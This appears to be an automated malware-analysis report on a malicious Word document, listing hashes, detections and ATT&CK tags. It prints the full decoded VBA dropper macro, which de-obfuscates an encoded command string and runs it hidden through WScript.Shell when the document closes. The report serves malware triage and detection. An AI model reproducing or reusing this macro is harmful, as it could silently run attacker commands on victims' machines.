Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d2b3946be545c3da…

MALICIOUS

Office (OOXML)

36.9 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-03-10
MD5: fa7c4c891eeea64acb6b517da7cf2615 SHA-1: 861fd776cdad3147e66cd7318c5656fabae5d310 SHA-256: d2b3946be545c3da30e779f60e73db1796073d6ca5ebef49a7cea7a75169cabf
284 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The macros utilize WScript.Shell and the Shell() function to execute commands, indicating a dropper or downloader functionality. The ClamAV detection 'Doc.Dropper.Agent-6398372-0' further supports this assessment. The script attempts to run a long, obfuscated string, likely a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6398372-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6398372-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(inoltrare) < 4774 Then
    CreateObject("WScript.Shell").Run inoltrare, vbHide * 4
  End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(inoltrare) < 4774 Then
    CreateObject("WScript.Shell").Run inoltrare, vbHide * 4
  End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2587 bytes
SHA-256: c054413918efdf1726987f2b694fffb94d0c6991e20e9ad2c64da4a8818d8b28
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function coperto(micelio As Integer) As String
 impiego = Array("v", "(", "P", "q", "/", "F", "d", "O", "D", "k", "A", "$", "o", ";", "C", "i", "r", "S", "w", "'", "T", "y", "c", ",", "B", "x", "t", "h", "I", "N", "l", "n", " ", "j", ")", "=", "-", "b", "?", ".", "E", "a", "m", "s", "e", "+", "p", "V", "\", "z", "W", "g", "u", ":")
 Dim lepre As Integer
 
 For lepre = LBound(impiego) To UBound(impiego)
   If lepre = micelio Then
    coperto = impiego(lepre)
   End If
 Next
 
End Function


Public Function tromba(inoltrare As String)
  If Len(inoltrare) < 4774 Then
    CreateObject("WScript.Shell").Run inoltrare, vbHide * 4
  End If
End Function

Sub Document_Close()
 feralo = pilifero("46121844164327443030323629124025152632364025442232242146414343323614124242413106320129441836073733442226321721432644423929442639504437143015443126343908121831301241060515304401192726264653040418061503180633271652414121212121414306060606392212420417170409413141261539304942192332114431005310020208102010324532194833462846473944254419341332172641162636021612224443433211443100531002020810201019483346284647394425441913320129441836073733442226321721432644423929442639504437143015443126343908121831301241061726161531510119272626465304041806150318063327165241412121212141430606060639221242044339462746381506350941314126151934")
 Application.Run "tromba", feralo
End Sub

Function etilico(ByVal carapace, ByVal vento) As String
 
 periodo = vbNullString
 parlato = Array(carapace, vento)
 
 For tattico = 0 To UBound(parlato)
   periodo = periodo + vbNullString + parlato(tattico) + vbNullString
 Next
 
 etilico = periodo
End Function

Function pilifero(Optional ribelle As String, Optional ribelle2)
  coricato = focoso(Trim(ribelle))
  sfamato = ""

  For lepre = 0 To Len(ribelle)
    If (lepre + 1) <= UBound(coricato) Then
    uovo = coricato(lepre + 1)
    proteso = coricato(lepre)
    onice = coperto(Int(coricato(lepre) + uovo))
    sfamato = etilico(sfamato, onice)
    lepre = lepre + 1
    End If
  Next
  
  pilifero = sfamato
End Function


Function focoso(cammino As String, Optional targato As Integer) As Variant
    focoso = Split(Left(StrConv(cammino, vbUnicode), Len(StrConv(cammino, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: 36df2ac54eee9a4c89356c73bbb1e1cdda9887ae085208c9379fc2664304b40b
Detection
ClamAV: Doc.Dropper.Agent-6398372-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.